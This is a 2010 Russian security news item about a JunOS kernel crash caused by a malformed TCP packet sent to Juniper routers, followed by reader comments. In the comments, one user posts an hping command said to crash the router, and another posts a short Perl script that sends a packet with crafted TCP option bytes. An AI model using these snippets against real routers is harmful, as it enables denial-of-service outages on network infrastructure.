08.01.2010 20:48
Уязвимость в маршрутизаторах Juniper, приводящая к краху ядра JunOS
|
 |
|
Компания Juniper Networks объявила об обнаружении уязвимости в ядре операционной системы JunOS, под которой работают большинство маршрутизаторов Juniper. Посылка специально сформированного TCP пакета (с неправильно оформленной заглавной частью) на открытый порт самого маршрутизатора вызывает крах ядра, ведущий за собой рестарт устройства. Встроенный межсетевой экран не в состоянии "поймать" и изолировать такой пакет.
Проблеме подвержены почти все версии JunOS, начиная с 5.3.5 p0-2 и заканчивая 9.0R1.1 (полный список приводится здесь). По словам Juniper Networks, проблема обнаружена самой компанией во время проверки на совместимость с оборудованием других производителей. Подробностей по поводу того каким образом должен быть сформирован пакет не сообщается. По неофициальным данным, обновление будет доступно в понедельник, 11 января.
|
|
|
- Главная ссылка к новости (http://praetorianprefect.com/archives/20...)
|
| Автор новости: Mr. Mistoffelees |
| Тип: Проблемы безопасности |
| Ключевые слова: Juniper, security, (найти похожие документы) |
| При перепечатке указание ссылки на opennet.ru обязательно |
| Реклама |
|
|
|
| |
| 1.3, chemtech, 10:54, 09/01/2010 [ответить] [смотреть все]
| +/– |
Была бы свободная прошивка, накатил патч, а тут ждать когда они обновят прошивку и не факт что еще все дыры залатали...
|  | | |
| 1.9, XoRe, 21:53, 09/01/2010 [ответить] [смотреть все]
| +/– |
>Подробностей по поводу того каким образом должен быть сформирован пакет
>не сообщается.
Можно попробовать подойти к вопросу с точки зрения комбинаторики.
Нагенерить 2 в степени n пакетов и поотсылать их устройству.
На каком пакете упадет, тот левый)
|  | | |
| 1.12, vgray, 10:38, 10/01/2010 [ответить] [смотреть все]
| +/– |
посмотрел видео, попробовал. там в описании ошибка небольшая. но все работает
hping -c 1 -p 23 -L 0 -M 0 192.168.10.210 -S -E ./jun/1012 -d 10 -O 7
убивает 9й джун наповал.
|  | | |
| |
| 2.23, vgray, 05:34, 11/01/2010 [ответить] [смотреть все] [показать ветку]
| +/– |
>А можно содержимое файлика /jun/1012. Всё равно 23-й порт закрыт от обычных
>пользователей.
увы не скажу, так как даже если порт закрыт ACL то все равно джунипер валится. Попробуйте почитать исходную новость и попробовать самим подобрать содержимое файла
| | | |
|
| 1.27, luzers, 14:27, 11/01/2010 [ответить] [смотреть все]
| +1 +/– | |
#!/usr/bin/perl
my $host = shift;
my $port = shift;
use Net::Packet qw($Env);
use Net::Packet::IPv4;
my $ip = Net::Packet::IPv4->new(dst => $host);
use Net::Packet::TCP;
my $tcp = Net::Packet::TCP->new(
dst => $port,
options => "\x65\x02\x01\x01",
);
use Net::Packet::Frame;
my $frame = Net::Packet::Frame->new(l3 => $ip, l4 => $tcp);
$frame->send;
exit 0;
| | | |
|
|
| Ваш комментарий |
|
|
| |
|
